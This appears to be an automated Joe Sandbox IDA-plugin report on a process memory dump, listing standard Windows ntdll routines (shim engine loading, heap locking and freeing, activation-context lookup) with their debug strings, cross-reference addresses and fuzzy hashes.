                                                                          • Instruction ID: 7276a93c673670fcaf33de203a9501549720c2fea96122c36011fe5bfd73fedc
                                                                          • Opcode Fuzzy Hash: e8817cfd5dbf74acf19b512a0d137c62fcad18399086439f5ea2ed6f9c5e2937
                                                                          • Instruction Fuzzy Hash: D551D471A04219AAEB11DFA5DC89FEE73B9FF08354F4004E9D905AF181EB709B45CEA0

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 35749372
                                                                          • GsHd, xrefs: 356FD794
                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35749178
                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35749153
                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 3574914E, 35749173
                                                                          • Actx , xrefs: 35749315
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                          • API String ID: 3446177414-2196497285

                                                                          APIs
                                                                          • RtlDebugPrintTimes.NTDLL ref: 356D651C
                                                                            • Part of subcall function 356D6565: RtlDebugPrintTimes.NTDLL ref: 356D6614
                                                                            • Part of subcall function 356D6565: RtlDebugPrintTimes.NTDLL ref: 356D665F
                                                                          Strings
                                                                          • apphelp.dll, xrefs: 356D6446
                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 357397B9
                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 35739790
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 357397A0, 357397C9
                                                                          • LdrpInitShimEngine, xrefs: 35739783, 35739796, 357397BF
                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3573977C
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 3446177414-204845295

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                          • API String ID: 3446177414-4227709934
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                          • API String ID: 3446177414-3492000579
                                                                          APIs
                                                                          Strings
                                                                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35739885
                                                                          • LdrpLoadShimEngine, xrefs: 3573984A, 3573988B
                                                                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35739843
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 35739854, 35739895
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 3446177414-3589223738
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                          • API String ID: 3446177414-3224558752
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                          • API String ID: 3446177414-1222099010
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $$@
                                                                          • API String ID: 3446177414-1194432280
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 3446177414-3610490719
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: Wow64 Emulation Layer
                                                                          • API String ID: 3446177414-921169906
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                          • String ID:
                                                                          • API String ID: 4281723722-0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @
                                                                          • API String ID: 0-2766056989
                                                                          APIs
                                                                          Strings
                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 356E0586
                                                                          • kLsE, xrefs: 356E05FE
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                          • API String ID: 3446177414-2547482624
                                                                          • Opcode ID: 7d9561e6c733af8ae9c32e9d0b1fdab4648d15d30fbfbdf03eb634ba3ede5405
                                                                          • Instruction ID: 246e454e037c5c93fd628f0829ad76594e5b6993a124fe85785f2b2de2f1901a
                                                                          • Opcode Fuzzy Hash: 7d9561e6c733af8ae9c32e9d0b1fdab4648d15d30fbfbdf03eb634ba3ede5405
                                                                          • Instruction Fuzzy Hash: 595101B5A13B06DFEB20DFA4C6446ABB3F4BF04320F00443ED5969B640EB709546CBA2
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: 0$0
                                                                          • API String ID: 3446177414-203156872
                                                                          • Opcode ID: cda8a75b1d0639a91a6f728b5fa59fb1523059f9b0a9aba932943ec087ce31d8
                                                                          • Instruction ID: 52622e8938c1ad9e57ee47ce6d8603161d97f143786e60cd06e4c3b24e360b4c
                                                                          • Opcode Fuzzy Hash: cda8a75b1d0639a91a6f728b5fa59fb1523059f9b0a9aba932943ec087ce31d8
                                                                          • Instruction Fuzzy Hash: 3E416AB1A08701EFD300CF28C444A5AFBE5BB88354F054A2EF988DB701D771EA05CB86